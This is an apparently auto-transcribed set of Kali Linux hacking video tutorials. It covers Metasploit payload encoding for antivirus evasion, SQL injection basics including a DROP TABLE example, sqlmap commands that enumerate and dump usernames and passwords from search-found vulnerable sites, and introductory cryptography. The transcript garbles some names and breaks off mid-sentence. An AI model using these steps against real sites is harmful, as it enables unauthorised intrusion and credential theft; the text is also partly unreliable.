exactly where we have seen it. Let's select social engineering, and I'll just go ahead and use some random stuff. And these two, and over here as you can see we have the Shikata Ganai. So this is where we have heard it previously. So coming back to our point, the into 86 Shikata Nagai encoder, it was used only when the null byte was restricted during the code generation. So if I add a few more bad characters, a different encoder may be used to accomplish the same task. So let's add several more bytes to the list and see what happens. So I'll just type generate b/ and over here I'll just go ahead and change some of the things such as /x44 /x67 /x66 /x, let's say. We'll also use some characters, and /x01 /xe0 /x44 /x 67, and what else? Let's say XA1, let's say for example, XA2 slash XA3 slash X75 slash X4B. Perfect. So we'll be using these and we will use a different encoder. So let's see what happens. All of these unwanted bytes were removed. Perfect. But the size over here is 350 bytes, whereas over here it was 355 and over here it was 328. So what is the difference? So we see a different encoder was used in order to successfully remove our unwanted bytes. Shikata Ganai was probably incapable of coding our payload using our restricted byte list, and FNS TEN on the other hand was able to accomplish the same thing. And as you can see, we have the FNS TEN which had encoded this. So having the ability to generate shellcode without use of certain characters is one of the greatest features offered by this framework. This doesn't mean it's limitless. If too many restricted bytes are given, no encoder may be set up for the task at which the Metasploit will display something such as the payload generation has failed. Let's go ahead and try something like that. I'll use the same code with a bit of modification. 44, 67, 66, XFA, X01, XEO, 67 until 4xb, and let me just go ahead and change this a bit. I'll use xff slash x0a slash, let's say, x0b slash x01, let's say, slash, you have x01. After that, let's say xcc slash 6e slash x1e, and then we have slash x2e. We have, let's say, slash x26, and let's see what happens right now. As you can see, no encoders encoded the buffer successfully. So it's like removing too many letters from the alphabet and asking someone to write a full sentence. Sometimes it just can't be done. And if you have seen that in movies that they can just go and type something and hack into something, that's how exactly this is. It does not work. In reality, at least not. You have to just sit inside in front of the computer and wait for something to happen. That's not going to happen. You have to actually try for that to happen. So using an encoder during a payload generation is not that difficult, but at the same time, it's not that easy as well. So as mentioned previously, the framework will choose the best encoder possible when generating our payload. However, there are times when one needs to use a specific type, regardless of what Metasploit thinks. Imagine an exploit that will successfully execute a command, provided it contains only non-alphanumeric characters. The Shikata-Nagai encoder would not be appropriate in this case, as it uses pretty much every characters available to encode. So looking at the encoder list, I'll go ahead and show you something different, but that would be it for this tutorial. And in the next tutorial, I'll be going ahead and I'll be ending this payload tutorial by showing you how we could actually go ahead and use some different encoders to redo our bind shell payloads. Hey guys, welcome to the next tutorial of ethical hacking and penetration testing via Kali Linux. So I'll be continuing the previous tutorial, and if you have not seen the previous tutorial, then there's no meaning in going ahead and watching this, because if you have not seen previously, then everything over here will go bouncer for you. So I'll just go through previously. As mentioned previously, the framework will choose the best encoder possible when generating our payload. But there are times when one needs to use a specific type, and regardless of what Metasploit thinks. So if you use a non-alphanumeric characters or some command that contains only non-alphanumeric characters, the Shikata-Ganai encoder would not be appropriate in this case, as it uses very much every characters available to encode. So looking at the encoder list, I will go ahead and use the non-alpha encoder, or into 32-bit non-alpha encoder that would be present. So I'll just go ahead and try to see what things are available. So I'll just type show, and I'll just type encoders. As you can see, we have these multiple payloads, but over here I would not be using them. I want something which does not contain alphanumeric characters. Let's see if we have that. Into 86 and let's see. Okay, so as you can see, we have the 32-bit non-alphanumeric character. It is quite low. It's not that good, but again, it's not about having the good one. Sometimes it's about actually going ahead and getting out of that. And where Shikata-Ganai was an excellent one, we will be using the lowest one, which is not that good. But still, it will prove to be excellent, and I'll show you how. So let's go ahead and generate a non-alphanumeric character payload. So I'll just type generate /e space into 86 slash, and I'll just type non alpha. Okay, no encoders, encoded the buffer successfully. Okay, I'll just go ahead and check. Okay, perfect. So let's redo our bind shell payload, but this time we'll tell the framework to use a non-alpha encoder, and I'll be using the e switch hyphen e switch over here. So previously it was not that good and it did not run in a perfect way. The reason being that I used that and it was a non-alpha encoder. But let me check if I could go and do that again. So if everything went according to what I said, our payload will not contain any alphanumeric characters, but we must be careful when we are, let's say, we're using a different encoder other than the default, as it tends to give us larger payload. For instance, this one is much larger than our previous examples. So let's go ahead and check what exactly. So okay, so -e to go ahead and use the name of the encoder, -e, and I'll just use into 86. Cannot see any reason why it is not using the tab completion. 6. Let me check if I could go and get more help. Yeah, I'll just go and show encoders, and I'll be using the non-alpha. So I'll just copy it and paste it over here. Okay, perfect. So what was the mistake that I did previously? Let me check. Non-alpha. Okay. Non-alpha. Into 86 non-alpha. Okay, I cannot see any. Okay, it was the spelling APLHA. My bad. Never mind. So our next option would be on the list would be the -f switch, and I'll just go ahead and show you exactly the generate help. -f is the output file name, so it's not a big deal. This gives us the ability to generate our payloads to a file instead of displaying it on screen. So as always, it follows the generate command with the file path. So you can just go ahead and type in the generate as just to show you -f, and you can just type root and wherever you want to go ahead and save it to, and the file name in the end. After that, we have the -b command, which is the list of characters to avoid that I have already taught you. And this is not exactly what I would be teaching you right now, because by using the cat command, that's the same way we would be using the command shell, we can see our payload was successfully saved. So as you can see it, it's also possible to use more than one option when generating a payload. So I just don't want to use the B. I can use the encoders, the characters to avoid, and the -f to go ahead and use the same thing. So the next on our list of option is the iteration switch. That would be -I. That's the number of encoding iterations. That would be in a nutshell. This tells the framework how many encoding it passes it must do before producing the final payload. One reason for doing this would be to create a stealth and antivirus evasion. Antivirus evasion is covered in greater detail in one of my later tutorials. So let's compare our bind shell payload generated using one iteration versus two iteration on the same shell code. So I can just go ahead and do the same thing again, generate -b, and I can just go ahead and type /00/ and I can hit enter, and then I can just go ahead and type the same thing plus -I and 2. So it will be encoded twice. So comparing the two outputs, you can see the obvious effect that the second one was 382 bytes and the previous one was 355 bytes. And the second one is quite a big and it's much better. So if you go ahead and compare the two, the effect, you can see the obvious effect that second iteration had on our payload. First of all, the byte size is larger. The more iterations one does, the larger our payload will be. Secondly, comparing the first few bytes of the highlighted code, you can also see they are no longer the same. This is due to the second iteration or second encoding pass. It encoded our payload once, then took the payload and encoded it again. So let's go ahead and look at our shell code and see how much of a difference 5 iterations would make. Just type 5 and okay, it's 463 bytes. Not that big, but again, sometimes it depends a lot. So the change is significant when compared to all the previous output. It's slightly larger and our bytes are nowhere near similar, which would in theory make this version of our payload less prone to detection. I have spent lots of time generating shellcode from the start with default values. So in case of a bind shell, the default listening port would be 4444, that as you can see over here, and the RFOD and everything else we would have to provide. Often this must be changed. So you can accomplish this by using the -o switch followed by the value that you wish to change. Let's take a look at which options we can change for this payload. From MSF console, I will issue the show options command, and as you can see, we have the L port as 4444. So I can just go ahead and type L port, and I can just type, let's say 445. So if I go ahead and check the show options, and as you can see, our L port has been changed to 445. So we can go ahead and change it to anything that you want. And the syntax is variable equals to value. That's it, nothing much. So it can be separated by a comma in between, so not much that way. After that, we have the generate -o command, and the L port. I can straight away go ahead and type, let's say, if I want to do multiple things at one time, -o, and I can type L port equals to 1, 2, 3, 4, and I can type comma, and I can type, let's say, exit function equals to SEH to go ahead and securely exit -b slash, and I can just type x00, and I need to go ahead and put this in quotes, then 0, and I can just go ahead and encode it using the into 86 slash shikata underscore girl underscore 9, and as you can see, it's again 355 bytes. The reason being that I have not ran it multiple times, but still it's good, and our port has been changed to 1234, and yep, that's it. You cannot see any x into 00 or anything other thing. So finally, let's take a look at the NOP, sled length, and the output format options. When generating payloads, the default output format given is Ruby. Although the Ruby language is extremely powerful and popular, not everyone codes in it, and we have the capacity to tell the framework to give it to give our payload in different coding formats such as Perl, C, or Java, for example. So adding a NOP sled at the beginning is also possible when generating our shell code. First, let's take a look at few different output formats and see how the -t switch is used. Like all the other options, all that needs to be done, it is a type in the switch followed by the format name as displayed in the help menu. So I can just type generate -t C, and it will be encoded in C again, and you won't see much of a difference over here. If I wanted it to encode in Java, then I can just type JAVA, and it will be encoded in Java. As you can see, the difference is quite huge, but the size is the same. Never mind. So looking at the output for the different programming languages, you can see that each output adheres to the respective language syntax. A hash is used for comments in Ruby, but in C, it's replaced with slash and asterisk, such as this and this. And that's the syntax. And looking at all the three outputs, the arrays are properly declared for the language format selected, making it ready to be copied and pasted into our script. So also adding NOP, that's no operation or next operation sled. It is accomplished with the -s switch followed by the number of NOPs. This will add the sled at the beginning of our payload, and keep in mind that the larger the sled, the larger the shellcode will be. So adding a 10 NOPs will add 10 bytes to the total size. And so I'll just go ahead and show it to you. Generate -s and 14. And you can see that it's 342 bytes in between, and it just added the 10 bytes. It was 335 or something like that, and it increased. So this highlights the yellow text shows us that the NOP sled at the payload's beginning, and comparing the next three lines with our shellcode, you will be able to see that they're exactly the same. Total bytes, as expected, grew by 14 bytes in total from 330 to its 342. Sorry, 328 to its 342. So yeah, that would be it for this tutorial, and that's much for payloads. It's there's nothing more much to that. So you can just go ahead and check every payload and see how they are encoded and get much more information to that. So that would be it for this tutorial, and in the next tutorial I'll be starting with the database of the MSF exploit, or sorry, not MSF exploit, of the MSF console, that's the Metasploit, and we'll get into much deeper database and how we can create our own database in that itself.
Hey guys, welcome to the next tutorial of ethical hacking and penetration testing via Kali Linux. So in this tutorial, we will be discussing about the SQL injection. So in this tutorial, I'll discuss in detail about the common SQL injection technique as it applies to the popular Microsoft Internet Information Server or the active server pages, SQL Server Platform, and more. It discusses the various ways in which SQL can be injected into an application and address some of the data validation and database lockdown issues that are related to this class of attack. This tutorial is intended to for both developers of web applications, and you can go ahead and communicate with databases with security professionals, and it will be very easy for you to go and audit your own websites after this. So to start with SQL, the full form is a structured query language. I'll explain in detail to you later on as to how we can actually go ahead and use that in our Kali Linux as a later point of time. So SQL, or a structured query language, it is a textual language used to interact with relational databases. There are many varieties of SQL, and most of them are common to use such as at the moment, and they're loosely based around SQL 92. The most recent is the ANSI standard. The typical unit of execution of SQL is the query, which is the collection of statements that typically return a single result. SQL statements can modify structures of databases using data definition language statements, or it is also called as DDL. They can even manipulate the contents of the databases using DML, that's data manipulation language statements. And in this tutorial, I'll be specifically discussing about the transact SQL, the dialect of SQL used by the Microsoft SQL Server, which we will go ahead and later use through our Kali Linux with the help of SQL map to go ahead and penetrate into different types of websites. So SQL injection occurs when an attacker is able to insert a series of queries or SQL statements into a query by manipulating the data into an application. It might be a bit hard for you to understand that right now, but it's not that hard, trust me. A typical SQL statement looks like, let me just open my notepad and I'll show it to you. So a typical data statement would look like select ID, or it can be like forename, or it can be like surname, or it can be like surname from authors. That means it will go and select all the surname from authors. So you might be wondering, it's quite easy, right? No, it's not that much easy. This statement will retrieve the ID, forename, and surname columns from the authors table, returning all rows in the table. So the result set could be restricted to specific authors like this. If you want to search any kind of specific people, then you could go ahead and search something like this: surname, select ID, forename, surname from authors, where forename, where is the condition over here, and the forename should be John, let's say, for example, and surname would be equal to, let's say, Diggle. So it will be something like this. It will go and select all the ID which has a forename of John and a surname with Diggle, John Diggle. So that's how it will work. So an important point to note here is that the string levels or string retrievals John and Smith are delimited with single quotes. Presuming that the forename and surname fields are being gathered from the user supplied unit, an attacker might be able to inject some SQL into this query by inputting values into the application. So one could do something like forename equals to jo query n, and you can type surname equals to Diggle. So you can do something like this. So this query string then goes ahead and becomes like you need to go ahead and search over here, but over here there would be an extra apostrophe like over here in John. So when the database attempts to run this query, it will 100% return an error because it will go ahead and check that John has three quotes over here, which it will not accept because it will either accept this specific as one phoneme or this specific as one phoneme, but it cannot go ahead and read a single word which has three quotes in it. So the reason for this is that insertion of single quote character, it breaks out the single quote delimited data. The bit database then tries to execute HN and failed. If the attacker specified input like this, let's say for example, I'll show you one more thing, and he can go ahead and do something like drop table authors hyphen hyphen and surname would be blank. If he goes ahead and inserts this thing, the authors table will be deleted. And I'll go ahead into deep into that later on as to how it works. So, but it will be deleted. And it would seem that some method of either removing single quotes from the input or escaping them in some way would handle this problem. This is true, but there are several difficulties with this method as a solution. First, not all your supply data is the form of strings. And if our user input could select an author by ID, presumably a number for example, our query would look different. It would look something like, let me just go down and select, it would do something like select ID, forename, surname from authors where ID equals 21234. So, in a situation, an attacker can simply append the SQL statements at the end of this specific numeric input. And once that is done, the attacker can easily go ahead and access things that you cannot even imagine. And in other SQL dialects, various delimiters are used, but in Microsoft JetDBMS, that's Database Management System Engine, for example, the date can be delimited with a single pound character. The second thing is that escaping single quotes is not necessarily the simplest cure it might initially seem, but for reasons I'll go into that later as well. So I will illustrate these points in further detail by using a sample active server pages, that's ASP login page, which access a SQL server database and attempts to authenticate access to some fictional application. So this is just a simple technique from my end so that people can actually go ahead and see how much their website is vulnerable. So attackers normally go ahead and inject these queries into the URL. So anything over here that can be inserted through the internet or the intranet is dangerous. This is the way how they go ahead and inject and destroy different types of databases. And trust me, guys, it's not even a bit secure, because if the person who's actually going ahead and trying to access your let's say system by using an SQL injection, he can straight away go ahead and get multiple usernames and along with the passwords and the databases. And once he goes ahead and gets that, he can go ahead and gather any kind of information, everything from their birth date to their card numbers, depending upon which website do you have, and everything. So yeah, that's how it works. And that's it, guys, for this tutorial. In the next tutorial, I'll be continuing in depth with the SQL injection. Hey guys, welcome to the next tutorial of ethical hacking and penetration testing via Kali Linux. So in the previous tutorial, I taught you exactly how we could go ahead and gather information through Google Docs. So in this tutorial, I'll be continuing with the first part, and this will be a 2 or 3 part tutorial in total. So just to be specific. So the initial check that we would be doing is that we would be confirming whether the website is vulnerable or not to a SQL map through SQL injection. For every string that I have showed you, you will get hundreds of search results. So you might be wondering, how do you know which is really vulnerable to SQL map injection? There's multiple ways to do that, and I'm sure that people will argue that which one is the best, but to me, I'll be following the simplest and the most conclusive stuff. So what you need to do is that, let's say you have searched a website using in URL column item underscore ID equals to, and one of the search result will show you a website like http sql dummywebsite.com/cgi/bin and item.cgi or something like that. So just you need to add a single quotation mark at the end of the URL. And just to ensure it is a double quotation mark and it is not a single quotation mark. So now your URL will become something like SQL dummy website .com/cgi/bin item cgi item equals to 15 apostrophe. So if the page returns an SQL error, the page is vulnerable to SQL map injection. So if it loads or redirects you to a different page, move on to the next site in your Google search results page. So you can see example errors over here that I have obscured everything, including the URL and the page design for obvious reasons. So these are the errors. Let me see if I have an image that I created last time. Okay, perfect. So I had this specific website that I used, And this was the error that I got. That's dbd mysql db select row. So I'll go ahead and show you specific things as to how we could actually what are the errors that we're going to get, and what does it mean exactly. So I'll just go to the previous one. Okay, so if you see this kind of error, so let me check. Okay, this was the website that I was telling you. This, I will assume that this is your website, and just put an apostrophe in the end and it will work. That's what it did to my actually. So these are the errors that you would be getting. So description would be over here for this, that it's an unhandled exception that's occurred during the execution of current web request. Please review the stack trace for information about the error, where it originated in the code, blah blah blah, and something like that. So you don't actually need to know much in detail about exactly what this is. So I'll show you different types of error that normally people would get. This is another one, that separate argument is not valid, MySQL fetch array, and yeah. So as you can see, it's in var www myawesomestore.com. That means this var means it is under Linux. If you have an error in SQL syntax, check the manual that corresponds to MySQL server version for the right syntax. That means the people have all the names inside quotes at line 12, and it is vulnerable to multiple quotes. Then we had the Java SQL, this SQL error, SQL command not properly entered at Oracle JDBC database, and yeah, SQL exception Java Oracle. Okay, perfect. Quoted string not properly terminated. This means that the error was not properly terminated, and some or the other thing, like for example, if you had used C++ or C before, then you know that you need to always go ahead and put a semicolon in the end for the specific command to end. But similarly over here, the specific code was not properly terminated, and that is the reason why we received this error. Then after that we have query failed, that's error. Unterminated quoted a string or at or near. That means that multiple quotes were there, or there were 3 quotes to start, but there were 4 quotes to end. That's why it was not properly terminated. And this is the final one. So let's go ahead and list the database management systems using SQL map, SQL injection. As you can see from over here, I have found an SQL map, SQL injection vulnerable website. That's this one. Now I need to list all the databases in that vulnerable database. This is called as enumerating number of columns. So as I am using SQL map, I'll tell you also which one is vulnerable. You need to go ahead and run a specific command. This is how it looks like when you go ahead and run the SQL map. This is the specific website, and it will show you everything. So in here, you need to go ahead and name your SQL map query. And over here, I'll just go ahead and show it out to you. Okay, I'll just go back. Perfect. So this is how it will look like. So before you proceed from over here, you need to go ahead and point something. So you need to go ahead and type SQL map over here. It means the name of the SQL binary file. -u, when you go ahead and use that over here, that means over here. -u is the target URL, which is in case our SQL dummy website.com. And hyphen DBS, it means it's just enumerating database management system databases. So this command will reveal quite a few interesting information. These are the things you will see when you go and run that. Apache backend database MySQL 5.0. Retrieved information scheme, retrieve SQL dummy website, fetch data log to text under user share SQL map output xyz.com or the SQL dummy website.com. This means that he has a Linux or a Unix system. So now we have 2 databases that we can look into. Information schema, that is a standard database for almost every MySQL database. So we don't need to worry about it. So our interest over here would be on the SQL dummy website database. So let's go ahead and list tables of target database using SQL map, SQL injection. So now we need to know how many tables this SQL dummy website database got and what are the names. So to find the information, we'll be using another command, that is this SQL-u http dummywebsite.com cgi bin item cgi 15. But after that I would be typing -d SQL dummy website space hyphen tables. So this database will get us these 8 different tables. It's more than 8 obviously, but these are the tables that we will get. That's fetching tables for databases, heuristics detected web page, and so these are the 8 databases that we would be getting: item, link, other, picture, picture tag, picture, popular tag, and user info. And of course, we want to check what's inside the user info table using SQL map injection, as that table probably contains username and passwords. So now coming to the step 4, we need to go and list all the list columns on target table of selected database using SQL map SQL injection. So now we need to list all the columns on the target table user info of SQL dummy website database using SQL map SQL injection. And SQL map SQL injection makes it really easy by us going ahead and running this following command. That's SQL map -u http dummy website.com and hyphen d SQL dummy website hyphen t user info slash hyphen columns. So this specific query, when ran, it will give us these specific tables. So that is the user ID, int unsigned, user login, varchar, user password, varchar, user ID. So this is exactly what we're looking for: target table, user login, and user password. So the next step that we would be doing would be to use or to list usernames from target columns of target table of selected database using SQL map injection. SQL map SQL injection makes this easy. So for us to go and do that, we need to go in and run this specific command. That's SQL map -u and blah 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 -d SQL dummy website -t user info -c user underscore login -dump. So when you go ahead and run this, you will be amazed to see what you have got. We will getting the username and from the database. So as you can see, we have retrieved user X, and it will go ahead and analyze the table dump for possible password hashes. So after we go ahead and do that, we need to extract the password from the target columns of the target table of the database using SQL map injection. So you're probably going to get used to how SQL map injection tool is used. And before I go ahead and proceed anything, that would be it for this tutorial. In the next tutorial, I'll be continuing with the gathering the password. And if once we go ahead and get the password, it will not exactly what you would expect it to be. So we need to again go ahead and crack the specific thing that we would be getting, which I'll be showing you into the next tutorial. Hey guys, and welcome to the next tutorial of ethical hacking and penetration testing via Kali Linux. So by far we have come to the almost end of the road, and there are very few topics left for me to go ahead and complete this tutorial. So in of these few topics, I will be covering cryptography and database and session hijacking. So what exactly is cryptography? That is the first thing. You may have heard in movies about the encryption and decryption process, or in lots of movies or spy movies, you may have heard that this file is encrypted, we need to crack it, and something or the other thing like that. So, what exactly is cryptography? In movies, they have actually gone way too far ahead and shown a lot of things that's not actually possible in reality. But reality is not that different as well. Cryptography is where security engineering meets mathematics, and it's get quite a hell lot of complicated over here. It provides us with the tools that underlie most modern security protocols, and it is probably the key enabling technology for protecting distributed systems. Yet it is surprisingly hard to do right. So, as we have seen previously, protocols cryptography have always been used to protect the wrong things, or they're used to protect them in the wrong way. So we will be seeing them in this tutorial today. So in this tutorial, I'll be teaching you what is cryptography exactly, its history, what are the basic 4 parts of cryptography, algorithms, strengths, encryption, decryption keys, and the advantages and disadvantages in the end. So to start with cryptography, there are always 2 parts, 2 main parts. One is the encryption and the other one is the decryption. So I'll be giving you more examples as we go ahead and start looking in detail at real applications. Unfortunately, the computer security and cryptology communities have drifted like way too far from each other over the last few years. So security people don't always understand that The available crypto tools and crypto people don't understand the real world problems. There are a number of reasons, such as different professional backgrounds, computer science versus mathematics, different research fundings, and besides that, government have tried to protect or promote computer security research while suppressing cryptography. So it reminds me something of a story told by one of my medical friends. He's in medical, and he told me that when he was young, he worked for a few years in a country where, for economic reasons, they had shortened their medical degrees and concentrated on producing specialists as quickly as possible. One day, a patient who had both kidneys removed and was awaiting a transplant needed his dialysis shunt redone. The surgeon sent the patient back from the theater on the grounds that there were no urinalysis on the file. It just didn't occur to him that the patient with no kidneys could not produce any urine. So, just as a doctor needs to understand physiology as well as surgery, so much a security engineer needs to be familiar with cryptography as well as computer security, and much with cryptography as well. So, I won't be teaching you cryptology, and these two are two different things, cryptology and cryptography. So I won't go much into mathematics today, and I'll just be explaining the basic institutions and constructions that seem to be the most cause of confusion. If you have to use cryptography in anything reassembling a novel way, then I would strongly recommend that you read a lot more about it. Computer security people often ask for the non mathematical definitions of a cryptographic terms. The basic terminology is that cryptography refers to science, an art of deciphering or designing ciphers, cryptanalysis to science and art of breaking them, while cryptology, often shortened to just crypto, is the study of both, that is cryptanalysis to science and designing ciphers. So the input to an encryption process is commonly called as the plain text, the output is called as the ciphertext, and thereafter things will get more complicated as I continue with this tutorial. There are n number of cryptographic primitives, basic building blocks such as block ciphers, stream ciphers, or hash functions. Block ciphers may either have one key for both encryption and decryption, in which case they are called as the shared key, and it can be again a secret key or symmetric or asymmetric, or they can have separate keys for encryption and decryption, in which case they are called as the public key or asymmetric key. And thereafter we will have a digital signature scheme, which is a special type of asymmetric crypto primitive. And in the rest of this tutorial, I'll give you some fine historical examples to illustrate the basic concepts of cryptography. Then I'll try to fine-tune definitions by introducing random oracle model, which many cryptologists use. Finally, I'll show you some of the more important cryptographic algorithm, how they actually work, and how they can be used to protect data. So, if you remember this, then you might remember some of the old movies such as Da Vinci Demons, I believe, or you can remember something like the English movies such as famous as Angels and Demons. So, you might be wondering what this is. In the previous days, mostly famous by Leonardo da Vinci, who actually went ahead and created, I can say, as the first ciphertext. He was the first one to go ahead and pass different messages secretly during the Florence Wars and a lot of other stuff. So you might be wondering that how this exactly would come in help. So in the previous days, there was not much thing like if you go some password or something. He used to go ahead and create different types of cipher, and there were different type of liquids inside a specific, let's say, as you can see, this is printer, but there is another thing in which the paper was written something like this, and you will need to go ahead and decipher all the keys in a proper way. If you are not able to do that, then there would be a liquid over here which would directly go ahead and surpass to the actual paper in which the note was written, and the note would straight away burn, or there won't be anything left of it inside. It can be acid, or it can be any phosphoric acid or something like that. So it will straight away go ahead and get burnt, and you won't even know what was the message exactly. So you need to know the password, else the message would completely destroy itself, and you cannot even go ahead and force open it from either end, because again it is protected. So any kind of tampering with that, and it will still straight away go ahead and again throw away the liquid on the paper in which the message was written. Even the paper was a specific type of paper in which you cannot actually go ahead and write any random thing. So that's how ciphering was done in the previous days. So the most ancient and the basic problem of cryptography is secure communication over an insecure channel. Let's say, for example, party A wants to send, let's say, party A wants to send a secret message to party B over a communication line which may be tapped by an, let's say, party C or an adversary. The traditional solution to this problem is called private key encryption. In private key encryption, A and B both hold a meeting before the remote transition takes place and agree on a pair of encryption and decryption algorithms. That's, let's say, for example, in our case, let it be E and D. E is encryption, D is a decryption. And an additional piece of information, let's say S in our case, will be kept as secret. So we shall refer S as the secret key. So to be more precise, A wants to send something to the party B without it to be tapped by the adversary C. So it goes ahead and uses the encryption E and the decryption key D, and it uses the secret common key that known as S. So the adversary, which is C, may know that the encryption and the decryption algorithms E and D which are being used, but it does not know S is the secret key. So after the initial meeting, when A wants to send B a clear text or a plain text message over the secure insecure communication line, A will encrypt a specific clear text by computing the cipher. Let's say, for example, C equals to E into SM, and it will send it to B. And upon receipt, B will decrypt it C by computing again message equals to D S of C. So I'll just go ahead and write it down for you so that it will be easier for you to understand. So A will go ahead and compute the ciphertext by typing C, not exactly C. I'll just go ahead and let's say for example, C M is our message, and is our encryption key, and S is our secret. So I will take X as the ciphertext. So I'll take X equals to E of S comma M. So this will be the ciphertext that he will be sending, and the decryption key that B would be receiving would be something like M equals to D of S comma X. So the line tapper or the adversary who does not know X should not be able to compute the M from X. If he's able to, then this would be of no use. It will be total waste. So this is how it works exactly in reality. But in the previous time, the Arabs, they generalized this idea to the mono-alphabetic substitution, in which a keyword is used to permute the cipher alphabet. So I will write the plain text in lowercase letters and the ciphertext in uppercase. So and it will be something like I'll just go and show you. I have one with me right now, so I'll just let me check if I have used that. Perfect. I'll show that later on. So the ciphertext would be something like CYAN space RWSGKR space AN space AH and RHTFANY MSOYRM OYSH SMSEAC NCMAKO. Okay. So when you go and look at this specific thing, you will not even recognize what it is exactly, but breaking ciphers of this kind is straightforward pencil and paper puzzle, which you may have done in primary school. The trick is that some letters and combination of letters are much common than others. And in English, most common letters are E, T, A, I, O, N, S, H, R, D, L, U in that order. So artificial intelligence researchers have shown that interest in writing programs to solve monoalphabetic substitutions using letter and digraph, that's letter pair frequencies alone, typically succeed with about 600 letters of ciphertext, while smart strategies such as guessing probable words can cut this to from 600 to 150 letters. And a human cryptanalyst will usually require much less, like approximately around 50 to 75 letters, and it will probably go ahead and actually crack this word. So if I go ahead and try to crack this, so it will be something like it will be I. So I will replace everything with I, and or rather than that, I'll just go ahead and show you an example. You can go ahead and try to crack it. This will be this. So you can go ahead and replace the CYAN that we had and replace every C with T, Y with H, A with I, and N with S. And you can straight away go ahead and try to crack this key. So this is an example as to how it was during previous days. So yeah, that would be it for this tutorial, and that's how it works. In the next tutorial, I'll be teaching you about the two different ways of making a cipher and how how in the previous days they used to go ahead and communicate through this type of plain text. Hello guys, and welcome to the next tutorial of ethical hacking and penetration testing via Kali Linux, and we are learning cryptography in this tutorial. So in the previous tutorial I taught you about what exactly cryptography is and how it works. So there are basically two ways to make a strong cipher, that is the stream cipher and the block cipher. So in the former, you can make encryption rule. That in the former, I mean the stream cipher, you can make the encryption rule depend on the plain text symbol, and that is you can go ahead and position in the stream of plain text symbols. While in block cipher, you have to encrypt several plain text symbols at once in a block. So to make it more precise or more clearer, this is an example that I would be showing you. This is how people used to go ahead and send messages in the previous days. So this was the plain text cipher, and this was the key when it was decrypted. This was the exact cipher that came out when it was encrypted. Again, when this key was used, you can see that the key is different. When this key was used, the plain text was exactly the opposite. That's Hail Hitler, and it was here Hang Hitler. But this is what the original the message was. This was the spy's what he told the message would be. But this was manipulated because he used two different things: the key from over here and cipher from over here. But the plain text was from over here. This is how you could go ahead and manipulate different types of ciphertext. The one-time pad is still used for high-level diplomatic and intelligence traffic, but it consumes as much key material as there is traffic. Hence, it is too expensive for most applications. And it's more common for mainstream, or you can say as stream ciphers, to use a suitable pseudo-random number generator to expand a short key into a long key stream. The data is, you can say, it's not encrypted. It's encrypted, but not that hard. But it's encrypted by using the exclusive O-ring in the key stream, one bit at a time, along with the data. It's not enough for the key stream to appear random, in the sense of, let's say, passing the standard series randomness test. It also must have the property that an opponent who gets their hands on even a number of keystream bits should not be able to predict any more of them. That means even if they have half the knowledge of exactly what is happening, they should not have the remaining knowledge just with the half of the knowledge. So you need to formalize this more tightly in the next section. Stream ciphers are commonly used nowadays in hardware applications where the number of gates has to be minimized to save power. I will look at some actual designs in later tutorials, including the A5 algorithm used to encipher GSM mobile traffic and the multiplex shift register system that's used in pay-per-view TV or copyright and privacy protection, or you can see, like, for example, the Kaspersky key, for example, where you are only allowed to go ahead and use the antivirus if you have a corporation for only selected computers. For more, you need to go ahead and purchase or buy more of their stuff. So, however, block ciphers are more suited for many applications where encryption is done in software. So let's look at some of them. The random oracle. So before delving into the detailed design of modern ciphers, I want to take a few pages to refine the definitions of the various types of cipher. So readers who are the people who are watching, who are phobic about theoretical computer science, can go ahead and skip this section. But I included this because you need a basic understanding of random oracles before you go ahead and proceed further. Before you go ahead and understand many recent research papers on cryptography. The oracle model, or the random oracle model, seeks to formalize the idea that a cipher is good if and when viewed in a suitable way. It is distinguishable from a random function of a certain type. I will call a cryptographic primitive pseudorandom if it passes all the statistical and other tests that a random function of the appropriate type would pass. In whichever model of computation we are using, of course, the cryptographic primitive will actually be an algorithm implemented as an array of gates in hardware or a program in software. But the outputs should look random by being indistinguishable from a suitable random oracle given the type and the number of text that our computation model permits. In this way, we can hope to, let's say, separate the problem of designing ciphers from the problem of using them correctly. Mathematicians who design ciphers can provide evidence that the cipher is pseudo-random. Quite separately, a computer scientist who has designed a cryptographic protocol can try to prove that it is secure on the assumption that the crypto primitives used to implement it are pseudo-random. The process is not infallible because, as I saw with proof of protocol correctness, theorems can have bugs similar to programs. Programs could be idealized wrongly, or the mathematicians might be using a different model of computation from the computer scientist. But at least some progress can be made though. So you can visualize a random oracle as an elf sitting in a black box, as you can see in the lower part of this image, and with a source of physical randomness and some means of storage. So the elf will accept inputs of certain type, then look in the scroll to see whether this query has ever been answered before. If so, it will give the answer it finds. If not, it will generate an answer at random times by throwing the dice. I'll further assume that there is some kind of bandwidth limitation that the elf will answer only so many queries every second. This ideal will turn out to be useful as a way of refining our notions of a stream cipher, a hash function, a block cipher, a public key encryption algorithm, and a digital signature screen. Finally, we will get a useful simplification of our conceptual model by noting that encryption can be used to protect data across time as well as across distance. A good example is when we encrypt data before storing it with a third party backup service and may decrypt it later if we have to recover from a disk crash. So, in this case, we need only a single encryption decryption device rather than one at each end of a communication link. This is sort of an application that, let's say, we will be modeling here. The user takes a diskette to the cipher machines, types in a key, issues an instruction, and the data gets transformed in an appropriate way. And that's how it works, to be more specific. Similar to random oracle model, we also have the random functions, that is the hash functions. So as you can see, it's quite self-explanatory. The first type of random oracle is the random function. A random function accepts an input string of any length and outputs a random string of fixed length, say n bits long. So the ELF just has a simple list of inputs and outputs which grows steadily as it works. I'll ignore any effects on the size of the scroll and assume that all queries are answered in constant time. So random functions are our model for one-way functions or cryptographic hash functions, which we may have practical uses for. They were first used in computer systems for one-way encryption of passwords in the 1960s, and as mentioned previously, they are used today in number of authentication systems. They are also used to compute message digest. Given a message, say a message M, we can pass it to pseudo-random function to give a digest, say H for M, which can stand in the message in various applications. One example is digital signature. Signature algorithms tend to be slow if the message is long. So it's usually convenient to sign a message digest rather than the message itself. Another application is timestamping. If we want evidence that we possessed, let's say, a given electronic document by a certain date, we might submit it to an online timestamping service. However, if the document is still secret, for example, an invention that we plan to patent and for which we merely want to establish a priority date, then we might not send the timestamping service the whole document but just the message digest. The output of the hash function is known as the hash value or message digest, an input corresponding to a given hash value in its pre-image. The verb to hash is used to refer the computation of hash value, and similarly the hash is also used a noun to refer to the hash value. So that's how it works in reality. And that would be it for this tutorial for this end. In the next tutorial, I'll be continuing with something called as the birthday theorem, the block, and the stream ciphers. Hey guys, and welcome to the next tutorial of ethical hacking and penetration testing via Kali Linux. So in this tutorial, we would be looking a look at the birthday theorem. So yep, it is exactly what it looks like. Gx raised to n plus y raised to n is unequal to z 